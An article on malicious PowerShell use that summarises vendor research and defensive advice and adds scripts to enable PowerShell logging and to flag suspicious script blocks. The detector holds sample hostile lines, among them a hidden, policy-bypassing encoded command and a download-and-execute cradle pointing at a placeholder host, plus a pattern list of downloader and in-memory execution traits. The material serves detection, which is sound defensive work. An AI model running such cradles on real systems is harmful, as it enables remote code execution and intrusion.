How to Guard Against Threats from Microsoft PowerShell Exploits
There are common cybersecurity best practices that most small business owners and IT managers know (or should know): Don’t click on links you don’t recognize. Back up your data regularly and in multiple forms. Use regularly updated anti-virus software. Train your employees.
What about guarding against PowerShell exploits? That’s a little off the beaten path, but security researchers say it’s an increasing problem.
PowerShell is a Microsoft utility that serves as a task automation and configuration management framework. It includes a command-line shell and an associated scripting language built on the .NET Framework. The tool lets administrators perform administrative tasks on both local and remote Windows systems and, through WS-Management and the Common Information Model (CIM), manage remote Linux systems and network devices. It has been around for more than 10 years and will replace the default command prompt on Windows in the future, security firm Symantec notes.
Symantec, Carbon Black Warn of PowerShell Vulnerabilities
According to a report last month from researchers at Symantec, “malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance.”
Symantec analyzed 111 threat families that use PowerShell, and the firm looked at the malware samples to find out how much of a danger they posed. Of the PowerShell scripts analyzed through the Blue Coat Malware Analysis sandbox, 95.4 percent were malicious, according to Symantec.
“This shows that externally sourced PowerShell scripts are a major threat to enterprises,” Candid Wüest, a threat researcher at Symantec, wrote in a blog post.
“While many system administrators use PowerShell scripts for daily management tasks, we have seen attackers increasingly using the framework for their campaigns,” Wüest says. “For example, the Odinaff group used malicious PowerShell scripts when it attacked financial organizations worldwide. Common cybercriminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry.”
Wüest notes that PowerShell is installed by default on most Windows computers, and most organizations “do not have extended logging enabled for the framework.”
“These two factors make PowerShell a favored attack tool. Furthermore, scripts can easily be obfuscated and allow for payloads to be executed directly from memory,” he notes.
Symantec has predominantly seen malicious PowerShell scripts used as downloaders (for example, by Office macros) and during “the lateral movement phase,” where a threat executes code on a remote computer when spreading inside the network.
The most prevalent malware families that currently use PowerShell are W97M.Downloader (9.4 percent of all analyzed samples), Trojan.Kotver (4.5 percent) and JS.Downloader (4.0 percent), according to Symantec.
Those specific threats have been distributed in spam emails. Over the last six months, Symantec says it blocked an average of 466,028 emails with malicious JavaScript per day, and this trend is growing. “Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage,” Wüest says. “Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections.”
Meanwhile, endpoint security firm Carbon Black released a separate report in December, noting that the company “discovered the first known instance of PowerShell being used in a ransomware attack with PowerWare” which “avoids writing new files to disk and tries to blend in with more legitimate computer activity.”
Carbon Black also noted that instances of non-malware attacks leveraging PowerShell and Windows Management Instrumentation (WMI) spiked by 93.2 percent in the second quarter of this year and, “after a brief reprieve, have grown to the highest levels we’ve seen in 2016 as we close out the year.”
How to Protect Against PowerShell Attacks
What should organizations, especially small businesses, do to guard against such threats?
As Windows IT Pro notes, “Symantec has skin in this game, of course. It wants you to buy its expertise and solutions.”
And indeed, Wüest notes that Symantec expects more PowerShell threats to appear in the future; the firm strongly recommends that system administrators “upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities.”
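The “extended logging” Symantec recommends is not on by default. The following is an added example, not code from the article or from Symantec, that turns on script block logging, module logging and transcription by writing the same policy registry values the PowerShell Group Policy templates set, then audits the result. It assumes PowerShell 5.0 or later (script block logging needs WMF 5), an elevated prompt, and a transcript directory of C:\PSTranscripts.

```powershell
# Added example: enable PowerShell extended logging via the policy registry keys.
# Assumes PowerShell 5.0+ and an elevated session; the transcript directory is assumed.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed location

    # Script block logging: records the de-obfuscated text of every script block
    # as it is compiled, so encoded or obfuscated payloads are captured (Event ID 4104).
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging: pipeline execution details for all modules ('*').
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -Type String

    # Transcription: full input/output text of every session, written to a directory
    # that should be append-only for users and forwarded off the host.
    $tr = Join-Path $PolicyRoot 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name OutputDirectory -Value $TranscriptDir -Type String
}

function Test-PowerShellLogging {
    # Returns one row per setting so a configuration audit can check each one.
    foreach ($check in @(
        @{ Key = 'ScriptBlockLogging'; Name = 'EnableScriptBlockLogging' },
        @{ Key = 'ModuleLogging';      Name = 'EnableModuleLogging' },
        @{ Key = 'Transcription';      Name = 'EnableTranscripting' })) {
        $path  = Join-Path $PolicyRoot $check.Key
        $value = (Get-ItemProperty -Path $path -Name $check.Name -ErrorAction SilentlyContinue).($check.Name)
        [pscustomobject]@{ Setting = $check.Name; Enabled = ($value -eq 1) }
    }
}

Enable-PowerShellLogging
Test-PowerShellLogging | Format-Table -AutoSize
# Script blocks now appear as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational
# log; forward that log (and the transcript directory) to central monitoring.
```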
Wüest also notes that Symantec and Norton customers are protected against PowerShell threats through the firm’s multilayered security approach. That includes its Anti-virus and Intrusion Prevention System (IPS); behavior-based detection that blocks suspicious processes using the Symantec Online Network for Advanced Response (SONAR) series of detections; email-filtering services such as Symantec Email Security; the Blue Coat Malware Analysis sandbox, which uses a powerful dual-detection approach that combines virtualization and emulation to detect malicious behavior; and other tools.
To guard against ransomware threats via PowerShell, Carbon Black recommends organizations take a slew of steps. These include backing up data regularly and verifying the integrity of those backups; securing offline backups; configuring firewalls to block access to known malicious IP addresses; logically separating networks; patching operating systems, software, and firmware on devices; and considering a centralized patch-management system.
Carbon Black also recommends implementing an awareness and training program; scanning all incoming and outgoing emails to detect threats and filtering executable files from reaching end users; enabling strong spam filters to prevent phishing emails from reaching end users; and authenticating inbound email using technologies such as Sender Policy Framework (SPF), Domain-based Message Authentication Reporting and Conformance (DMARC), and DomainKeys Identified Mail (DKIM) to prevent spoofing.
Additionally, Carbon Black says firms should take the following steps:
- Use ad-blocking technology
- Use the principle of “least privilege” to manage accounts so that no users are assigned administrative access unless it is absolutely needed
- Leverage next-generation anti-virus technology to inspect files and to identify malicious behavior in order to block malware and malware-less attacks that exploit memory and scripting languages like PowerShell
- Use application whitelisting, which only allows systems to execute programs known and permitted by security policy
- Categorize data based on organizational value and implement physical and logical separation of networks and data for different organizational purposes
- Conduct an annual penetration test and vulnerability assessment
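The behaviors the article attributes to malicious PowerShell use (obfuscated or encoded commands, payloads run directly from memory, and staged downloads) leave traces in the script block log once it is enabled. The following is an added example, not from the article or from either vendor, that scores Event ID 4104 script block text against those traits and reports only blocks matching more than one of them, so a lone administrative download is not flagged. The pattern list and the sample entries are constructed for illustration, not a vendor rule set.

```powershell
# Added example: score PowerShell script-block log text (Event ID 4104) for the
# traits the article describes. Patterns and samples below are constructed, not a vendor rule set.

$SuspiciousPatterns = [ordered]@{
    EncodedCommand = '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'
    Base64Decode   = '(?i)FromBase64String'
    InMemoryExec   = '(?i)\b(IEX|Invoke-Expression)\b'
    Downloader     = '(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest)'
    HiddenWindow   = '(?i)-w(indowstyle)?\s+hidden'
    PolicyBypass   = '(?i)-(ep|ex|executionpolicy)\s+bypass'
}

function Get-SuspiciousScriptBlock {
    # Emits one object per script block that matches at least $MinHits traits;
    # a single match (for example an admin's Invoke-WebRequest) is not reported on its own.
    param(
        [Parameter(ValueFromPipeline)][string]$ScriptText,
        [int]$MinHits = 2
    )
    process {
        $hits = @($SuspiciousPatterns.Keys | Where-Object { $ScriptText -match $SuspiciousPatterns[$_] })
        if ($hits.Count -ge $MinHits) {
            [pscustomobject]@{
                Indicators = $hits -join ','
                Snippet    = $ScriptText.Substring(0, [Math]::Min(70, $ScriptText.Length))
            }
        }
    }
}

# Constructed sample entries: two routine admin commands and two that show the
# obfuscation/downloader pattern (the base64 body is a placeholder, not a payload).
$samples = @(
    'Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 10MB',
    'Invoke-WebRequest https://example.invalid/report.csv -OutFile C:\Temp\report.csv',
    "powershell -w hidden -ep bypass -enc $('A' * 40)",
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2")'
)
$samples | Get-SuspiciousScriptBlock | Format-Table -AutoSize

# On a host with script block logging enabled, run the same filter over the real log
# (Properties[2] of a 4104 event holds the script block text):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Properties[2].Value } | Get-SuspiciousScriptBlock
```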